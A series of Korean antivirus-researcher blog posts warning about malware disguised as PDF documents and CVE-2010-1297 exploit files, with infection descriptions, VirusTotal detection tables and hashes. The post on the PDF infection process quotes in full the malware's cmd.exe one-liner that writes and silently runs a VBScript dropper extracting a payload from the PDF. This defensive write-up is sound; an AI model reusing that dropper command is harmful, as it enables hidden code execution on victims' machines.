태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2010.06.17 10:05


유사 악성코드 변종 정보 보기
Changelog 내용으로 퍼지는 악성코드
viruslab.tistory.com

PDF 문서(Changelog) 처럼 위장한 악성코드(변종)가 국내에 전파되고 있으니 주의하시면 좋겠습니다.

제목 :
Changelog 07.06.2010

내용 :
Dear Customers,
as promised,
(발신자 아이디)

첨부파일 :
Changelog_15.06.2010.PDF.zip

사용자 삽입 이미지

첨부되어 있는 Changelog_15.06.2010.PDF.zip 파일이 악성코드이며, 파일명 부터 정상적인 PDF 문서처럼 위장하고 있습니다.

사용자 삽입 이미지

"Changelog_15.06.2010.PDF.exe" 파일명을 가지고 있으며, PDF.exe 로 2중 확장자를 가지고 있습니다. 이것은 사용자가 윈도우 폴더 옵션에서 확장명 숨기기 기능이 활성화 되어 있을 경우 PDF 파일 처럼 보이도록 하기 위한 위장 수법 입니다.

이러한 악성코드에 속지 않기 위해서는 폴더 옵션의 파일 확장명 숨기기 기능을 해제해 두시는 것이 좋겠지요. 추가로 숨김 파일 및 폴더 옵션도 보이도록 설정해 두시면 숨김 활동을 하는 악성코드를 파악하시는 데 도움이 된답니다.

사용자 삽입 이미지

악성코드 파일은 Adobe PDF 문서처럼 위장하기 위해서 아이콘도 위장하고 있습니다.

사용자 삽입 이미지

이러한 악성코드는 여러 차례 변종이 발견된 바 있는데, 보통 UPS 나 Fedex 와 같은 배송장 문서처럼 위장하고 있기도 하며, 감염되면 허위 보안 제품류 등을 설치하여 가짜로 악성코드 진단 결과를 보여주어 소액 결제를 통한 금전적 이득을 취하기 위한 사이버 범죄 등으로 악용되어지고 있지요.

변종 정보는 아래에서 확인해 볼 수 있습니다.
http://viruslab.tistory.com/1777
http://viruslab.tistory.com/1527

현재 국내 대부분의 Anti-Virus 제품에서 진단되지 않고 있어 각별한 주의가 필요하며, nProtect Anti-Virus 금일 업데이트에 치료 기능이 추가될 예정입니다.

다른 국내 보안업체분들도 이 내용을 보시면 업데이트에 추가하실 것입니다.

http://www.virustotal.com/analisis/675f5fbc635d97c6d3894e3edafd86fbab80316eeaaaf3c50b34bb8f58874e3c-1276731622

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.16 -
AhnLab-V3 2010.06.16.07 2010.06.16 -
AntiVir 8.2.2.6 2010.06.16 TR/Dropper.Gen
Antiy-AVL 2.0.3.7 2010.06.11 -
Authentium 5.2.0.5 2010.06.16 -
Avast 4.8.1351.0 2010.06.16 -
Avast5 5.0.332.0 2010.06.16 -
AVG 9.0.0.787 2010.06.17 -
BitDefender 7.2 2010.06.17 -
CAT-QuickHeal 10.00 2010.06.16 -
ClamAV 0.96.0.3-git 2010.06.16 -
Comodo 5125 2010.06.17 -
DrWeb 5.0.2.03300 2010.06.17 -
eSafe 7.0.17.0 2010.06.16 -
F-Prot 4.6.0.103 2010.06.16 -
F-Secure 9.0.15370.0 2010.06.17 -
Fortinet 4.1.133.0 2010.06.16 -
GData 21 2010.06.17 -
Ikarus T3.1.1.84.0 2010.06.16 -
Jiangmin 13.0.900 2010.06.15 -
Kaspersky 7.0.0.125 2010.06.16 Worm.Win32.VBNA.b
McAfee 5.400.0.1158 2010.06.17 -
McAfee-GW-Edition 2010.1 2010.06.16 -
Microsoft 1.5902 2010.06.17 -
NOD32 5202 2010.06.16 -
Norman 6.04.12 2010.06.16 -
nProtect 2010-06-16.01 2010.06.16 -
Panda 10.0.2.7 2010.06.16 Suspicious file
PCTools 7.0.3.5 2010.06.17 -
Prevx 3.0 2010.06.17 High Risk Cloaked Malware
Rising 22.51.06.01 2010.06.13 -
Sophos 4.54.0 2010.06.16 -
Sunbelt 6458 2010.06.17 FraudTool.Win32.AVSoft (v)
Symantec 20101.1.0.89 2010.06.16 -
TheHacker 6.5.2.0.299 2010.06.15 -
TrendMicro 9.120.0.1004 2010.06.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.17 -
VBA32 3.12.12.5 2010.06.16 -
ViRobot 2010.6.14.3884 2010.06.16 -
VirusBuster 5.0.27.0 2010.06.16 -
Additional information
File size: 39424 bytes
MD5   : abad460ab08ee93b05c63bdc4ad1d707

Posted by viruslab
리버싱지식2010.06.15 17:26
보안관련소식2010.06.09 12:17


PDF 취약점 파일 감염 과정입니다.

보통 이메일 첨부파일 형태로 불특정 다수에게 배포되기도 합니다.

참고 자료 보기
pdf 악성코드 메일로 유포된 사례
viruslab.tistory.com

먼저 해당 파일을 실행하면 다음과 같은 화면과 문서 파일이 뒷부분으로 보여집니다.

사용자 삽입 이미지

C:\WINDOWS\system32\cmd.exe /c echo Dim BinaryStream > temp_system321.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream") >> temp_system321.vbs && echo BinaryStream.Type = 1 >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.LoadFromFile FindLastModified(".") >> temp_system321.vbs && echo BinaryStream.Position=77072      >> temp_system321.vbs && echo s = BinaryStream.Read (204444    -77072     ) >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.Write s >> temp_system321.vbs && echo BinaryStream.SaveToFile "temp_system322.vbs",2 >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo dim wshshell >> temp_system321.vbs && echo set wshshell = wscript.createobject("wscript.shell") >> temp_system321.vbs && echo wshshell.run "temp_system322.vbs",0,FALSE >> temp_system321.vbs && echo Function FindLastModified(strDir)   >> temp_system321.vbs && echo Set objFSO = CreateObject("Scripting.FileSystemObject")   >> temp_system321.vbs && echo Set oFolder = objFSO.GetFolder(strDir)   >> temp_system321.vbs && echo d = CDate("1/1/1950")   >> temp_system321.vbs && echo For Each oFile In oFolder.Files   >> temp_system321.vbs && echo If oFile.DateLastModified ^> d and InStr(oFile.Name, ".pdf") ^> 0 Then   >> temp_system321.vbs && echo NewestFile = oFile.Name   >> temp_system321.vbs && echo d = oFile.DateLastModified   >> temp_system321.vbs && echo End If   >> temp_system321.vbs && echo Next   >> temp_system321.vbs && echo FindLastModified = NewestFile   >> temp_system321.vbs && echo End Function    >> temp_system321.vbs  && temp_system321.vbs


  && echo


PLEASE PRESS OK BUTTON!



사용자 삽입 이미지

system321.vbs, system322.vbs 등의 스크립트 파일을 생성하여 exe 파일을 설치합니다.
 
사용자 삽입 이미지
사용자 삽입 이미지

현재 system32.exe 파일이 생성되지만 손상된 형태로 만들어지고 있는 것으로 파악되었습니다.

바이러스 토탈 진단 현황

http://www.virustotal.com/analisis/1e70058128ebfff634a453483dd48cc4e929bda17e960d1d5c0e2b7722ca017a-1276041725

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.09 Exploit.PDF-Dropper!IK
AhnLab-V3 2010.06.09.00 2010.06.09 -
AntiVir 8.2.2.6 2010.06.08 -
Antiy-AVL 2.0.3.7 2010.06.08 -
Authentium 5.2.0.5 2010.06.08 PDF/Expl.HY
Avast 4.8.1351.0 2010.06.08 PDF:Risk-A
Avast5 5.0.332.0 2010.06.08 PDF:Risk-A
AVG 9.0.0.787 2010.06.08 -
BitDefender 7.2 2010.06.09 Exploit.PDF-Dropper.Gen
CAT-QuickHeal 10.00 2010.06.08 -
ClamAV 0.96.0.3-git 2010.06.09 -
Comodo 5033 2010.06.09 -
DrWeb 5.0.2.03300 2010.06.09 -
eSafe 7.0.17.0 2010.06.08 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7618 2010.06.08 PDF/POS!exploit
F-Prot 4.6.0.103 2010.06.08 -
F-Secure 9.0.15370.0 2010.06.08 Exploit.PDF-Dropper.Gen
Fortinet 4.1.133.0 2010.06.08 -
GData 21 2010.06.09 Exploit.PDF-Dropper.Gen
Ikarus T3.1.1.84.0 2010.06.08 Exploit.PDF-Dropper
Jiangmin 13.0.900 2010.06.08 -
Kaspersky 7.0.0.125 2010.06.08 Trojan-Dropper.VBS.Pdfka.a
McAfee 5.400.0.1158 2010.06.09 Exploit-PDF.ck
McAfee-GW-Edition 2010.1 2010.06.08 -
Microsoft 1.5802 2010.06.08 -
NOD32 5183 2010.06.08 -
Norman 6.04.12 2010.06.08 -
nProtect 2010-06-08.01 2010.06.08 Exploit.PDF-Dropper.Gen
Panda 10.0.2.7 2010.06.08 -
PCTools 7.0.3.5 2010.06.09 HeurEngine.PDF
Prevx 3.0 2010.06.09 -
Rising 22.51.01.04 2010.06.08 -
Sophos 4.53.0 2010.06.09 -
Sunbelt 6421 2010.06.09 -
Symantec 20101.1.0.89 2010.06.08 Bloodhound.PDF.24
TheHacker 6.5.2.0.295 2010.06.08 -
TrendMicro 9.120.0.1004 2010.06.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.09 -
VBA32 3.12.12.5 2010.06.08 -
ViRobot 2010.6.8.2343 2010.06.08 -
VirusBuster 5.0.27.0 2010.06.08 VBS.Exedrop.F



Posted by viruslab
신종악성코드정보2010.06.08 14:42


Adobe Security bulletin
CVE-2010-1297
adobe.com

2010년 6월 4일에 보고된 플래시 플레이어, 어도브 리더, 아크로뱃 Zero-Day 취약점 공격 파일의 진단 현황입니다.

사용자 삽입 이미지

바이러스 토탈 진단현황
Trojan-Exploit/W32.Pidief.268333.EY

virustotal.com

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.08 HTML.Malicious!IK
AhnLab-V3 2010.06.08.00 2010.06.08 PDF/Cve-2010-1297
AntiVir 8.2.2.6 2010.06.07 HTML/Malicious.PDF.Gen
Antiy-AVL 2.0.3.7 2010.06.04 -
Authentium 5.2.0.5 2010.06.08 PDF/Expl.HW
Avast 4.8.1351.0 2010.06.07 JS:Pdfka-gen
Avast5 5.0.332.0 2010.06.07 JS:Pdfka-gen
AVG 9.0.0.787 2010.06.07 Exploit_c.GGK
BitDefender 7.2 2010.06.08 Exploit.SWF.J
CAT-QuickHeal 10.00 2010.06.08 -
ClamAV 0.96.0.3-git 2010.06.08 Exploit.PDF-28487
Comodo 5022 2010.06.07 -
DrWeb 5.0.2.03300 2010.06.08 -
eSafe 7.0.17.0 2010.06.06 -
eTrust-Vet 36.1.7617 2010.06.07 PDF/Pidief.RP
F-Prot 4.6.0.103 2010.06.07 PDF/Expl.HW
F-Secure 9.0.15370.0 2010.06.08 Exploit:W32/Pidief.CPT
Fortinet 4.1.133.0 2010.06.06 -
GData 21 2010.06.08 Exploit.SWF.J
Ikarus T3.1.1.84.0 2010.06.08 HTML.Malicious
Jiangmin 13.0.900 2010.06.07 -
Kaspersky 7.0.0.125 2010.06.08 Exploit.JS.Pdfka.ckq
McAfee 5.400.0.1158 2010.06.08 -
McAfee-GW-Edition 2010.1 2010.06.07 -
Microsoft 1.5802 2010.06.08 Exploit:Win32/Pdfjsc.gen!A
NOD32 5180 2010.06.07 -
Norman 6.04.12 2010.06.07 JS/Shellcode.IK
nProtect 2010-06-07.01 2010.06.07 Trojan-Exploit/W32.Pidief.268333.EY
Panda 10.0.2.7 2010.06.07 -
PCTools 7.0.3.5 2010.06.08 Trojan.Pidief
Prevx 3.0 2010.06.08 -
Rising 22.51.01.00 2010.06.08 -
Sophos 4.53.0 2010.06.08 Troj/SWFDlr-S
Sunbelt 6417 2010.06.08 -
Symantec 20101.1.0.89 2010.06.08 Trojan.Pidief.J
TheHacker 6.5.2.0.292 2010.06.04 -
TrendMicro 9.120.0.1004 2010.06.07 TROJ_PIDIEF.WX
TrendMicro-HouseCall 9.120.0.1004 2010.06.08 TROJ_PIDIEF.WX
VBA32 3.12.12.5 2010.06.07 -
ViRobot 2010.6.7.2341 2010.06.08 JS.S.EX-Pdfka.268333
VirusBuster 5.0.27.0 2010.06.07 -

Posted by viruslab
신종악성코드정보2010.06.08 13:35


Adobe Reader 사용자분들은 이러한 파일을 받으시면 절대로 실행하지 마시길 권장해 드립니다.

제목 :
New Resume

내용 :
Please review my CV, Thank You!

첨부파일 :
resume.pdf

CVCurriculum Vitae 를 의미하며, 보통 이력서를 표현하는 약어이기도 합니다.

사용자 삽입 이미지

이러한 내용으로 유포된 악성코드는 예전에도 다수 보고된 바 있으며, PDF 취약점 파일을 이용하는 방식으로 변경되어 유포되고 있습니다.

바이러스 토탈 진단현황
Result: 8/41 (19.51%)
virustotal.com

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.08 -
AhnLab-V3 2010.06.08.00 2010.06.08 -
AntiVir 8.2.2.6 2010.06.07 -
Antiy-AVL 2.0.3.7 2010.06.04 -
Authentium 5.2.0.5 2010.06.08 -
Avast 4.8.1351.0 2010.06.07 -
Avast5 5.0.332.0 2010.06.07 -
AVG 9.0.0.787 2010.06.07 -
BitDefender 7.2 2010.06.08 Exploit.PDF-Dropper.Gen
CAT-QuickHeal 10.00 2010.06.08 -
ClamAV 0.96.0.3-git 2010.06.08 -
Comodo 5022 2010.06.07 -
DrWeb 5.0.2.03300 2010.06.08 -
eSafe 7.0.17.0 2010.06.06 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7617 2010.06.07 PDF/POS!exploit

F-Prot 4.6.0.103 2010.06.07 -
F-Secure 9.0.15370.0 2010.06.08 Exploit.PDF-Dropper.Gen
Fortinet 4.1.133.0 2010.06.06 -
GData 21 2010.06.08 Exploit.PDF-Dropper.Gen
Ikarus T3.1.1.84.0 2010.06.08 -
Jiangmin 13.0.900 2010.06.07 -
Kaspersky 7.0.0.125 2010.06.08 -
McAfee 5.400.0.1158 2010.06.08 -
McAfee-GW-Edition 2010.1 2010.06.07 -
Microsoft 1.5802 2010.06.08 -
NOD32 5180 2010.06.07 -
Norman 6.04.12 2010.06.07 -
nProtect 2010-06-07.01 2010.06.07 Exploit.PDF-Dropper.Gen
Panda 10.0.2.7 2010.06.07 -
PCTools 7.0.3.5 2010.06.08 HeurEngine.PDF
Prevx 3.0 2010.06.08 -
Rising 22.51.01.00 2010.06.08 -
Sophos 4.53.0 2010.06.08 -
Sunbelt 6417 2010.06.08 -
Symantec 20101.1.0.89 2010.06.08 Bloodhound.PDF.24
TheHacker 6.5.2.0.292 2010.06.04 -
TrendMicro 9.120.0.1004 2010.06.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.08 -
VBA32 3.12.12.5 2010.06.07 -
ViRobot 2010.6.8.2342 2010.06.08 -
VirusBuster 5.0.27.0 2010.06.07 -



Posted by viruslab
신종악성코드정보2010.06.07 13:21


Adobe CVE-2010-1297 PDF 취약점 시연 화면 입니다.

PDF Zero-Day 공격 취약점 주의
아직 보안패치가 발표되지 않았으니 각별히 주의하세요.
www.adobe.com

트랜드 마이크로 분석 정보
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FPIDIEF%2EWX&VSect=T

바이러스 토탈 진단 현황
http://www.virustotal.com/analisis/bd2776e507cf0284a9cfb7deb9a241d6699243a221c125f9911fa753ca8f01d1-1275886442

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.07 HTML.Malicious!IK
AhnLab-V3 2010.06.06.00 2010.06.06 -
AntiVir 8.2.2.6 2010.06.06 HTML/Malicious.PDF.Gen
Antiy-AVL 2.0.3.7 2010.06.04 -
Authentium 5.2.0.5 2010.06.06 -
Avast 4.8.1351.0 2010.06.06 JS:Pdfka-gen
Avast5 5.0.332.0 2010.06.06 JS:Pdfka-gen
AVG 9.0.0.787 2010.06.06 Exploit_c.GGK
BitDefender 7.2 2010.06.07 Exploit.SWF.J
CAT-QuickHeal 10.00 2010.06.07 -
ClamAV 0.96.0.3-git 2010.06.07 -
Comodo 5013 2010.06.07 -
DrWeb 5.0.2.03300 2010.06.07 -
eSafe 7.0.17.0 2010.06.06 -
eTrust-Vet 35.2.7528 2010.06.04 -
F-Prot 4.6.0.103 2010.06.06 -
F-Secure 9.0.15370.0 2010.06.07 Exploit:W32/Pidief.CPT
Fortinet 4.1.133.0 2010.06.06 -
GData 21 2010.06.07 Exploit.SWF.J
Ikarus T3.1.1.84.0 2010.06.07 HTML.Malicious
Jiangmin 13.0.900 2010.06.06 -
Kaspersky 7.0.0.125 2010.06.07 Exploit.JS.Pdfka.ckq
McAfee 5.400.0.1158 2010.06.07 -
McAfee-GW-Edition 2010.1 2010.06.06 -
Microsoft 1.5802 2010.06.06 Exploit:Win32/Pdfjsc.gen!A
NOD32 5177 2010.06.06 -
Norman 6.04.12 2010.06.06 -
nProtect 2010-06-06.01 2010.06.06 -
Panda 10.0.2.7 2010.06.06 -
PCTools 7.0.3.5 2010.06.07 -
Prevx 3.0 2010.06.07 -
Rising 22.51.00.01 2010.06.07 -
Sophos 4.53.0 2010.06.07 -
Sunbelt 6414 2010.06.07 -
Symantec 20101.1.0.89 2010.06.07 -
TheHacker 6.5.2.0.292 2010.06.04 -
TrendMicro 9.120.0.1004 2010.06.06 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.07 TROJ_PIDIEF.WX
VBA32 3.12.12.5 2010.06.04 -
ViRobot 2010.6.5.2339 2010.06.07 JS.S.EX-Pdfka.268333
VirusBuster 5.0.27.0 2010.06.06 -


nProtect Anti-Virus 6월 7일자에 치료 기능 추가



 




Posted by viruslab
신종악성코드정보2009.06.05 09:23


OBM-READ.PDF.exe 라는 파일명으로 유포되는 악성코드이다.

아이콘도 Adobe PDF 처럼 위장하고 있다.

사용자 삽입 이미지
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.06.04 Worm.Win32.Pushbot!IK
AhnLab-V3 5.0.0.2 2009.06.05 -
AntiVir 7.9.0.180 2009.06.04 Worm/Pushbot.16691
Antiy-AVL 2.0.3.1 2009.06.04 -
Authentium 5.1.2.4 2009.06.04 -
Avast 4.8.1335.0 2009.06.04 -
AVG 8.5.0.339 2009.06.04 -
BitDefender 7.2 2009.06.04 -
CAT-QuickHeal 10.00 2009.06.04 -
ClamAV 0.94.1 2009.06.05 -
Comodo 1259 2009.06.05 -
DrWeb 5.0.0.12182 2009.06.05 -
eSafe 7.0.17.0 2009.06.04 Win32.Banker
eTrust-Vet 31.6.6540 2009.06.05 -
F-Prot 4.4.4.56 2009.06.04 -
F-Secure 8.0.14470.0 2009.06.05 Backdoor.Win32.SdBot.msn
Fortinet 3.117.0.0 2009.06.04 -
GData 19 2009.06.04 -
Ikarus T3.1.1.59.0 2009.06.05 -
K7AntiVirus 7.10.754 2009.06.04 -
Kaspersky 7.0.0.125 2009.06.05 Backdoor.Win32.SdBot.msn
McAfee 5636 2009.06.04 -
McAfee+Artemis 5636 2009.06.04 Artemis!CD89302FF375
McAfee-GW-Edition 6.7.6 2009.06.05 Worm.Pushbot.16691
Microsoft 1.4701 2009.06.05 Worm:Win32/Pushbot.gen
NOD32 4132 2009.06.04 -
Norman 6.01.09 2009.06.04 -
nProtect 2009.1.8.0 2009.06.04 -
Panda 10.0.0.14 2009.06.04 -
PCTools 4.4.2.0 2009.06.02 -
Prevx 3.0 2009.06.05 Medium Risk Malware
Rising 21.32.34.00 2009.06.04 -
Sophos 4.42.0 2009.06.04 -
Sunbelt 3.2.1858.2 2009.06.04 -
Symantec 1.4.4.12 2009.06.05 Suspicious.MH690.A
TheHacker 6.3.4.3.339 2009.06.03 -
TrendMicro 8.950.0.1092 2009.06.04 -
VBA32 3.12.10.6 2009.06.05 -
ViRobot 2009.6.4.1769 2009.06.04 -
Additional information
File size: 166912 bytes
MD5   : cd89302ff3758cd565a8c7489a11b8e5
SHA1  : 4ed74e8ce3ba3f7e69cadf3ce9ca739719d65e97
SHA256: ee7f4b461f47922d3a31a4631345dcc66f0b3b65589102917315ee3227285cf4





Posted by viruslab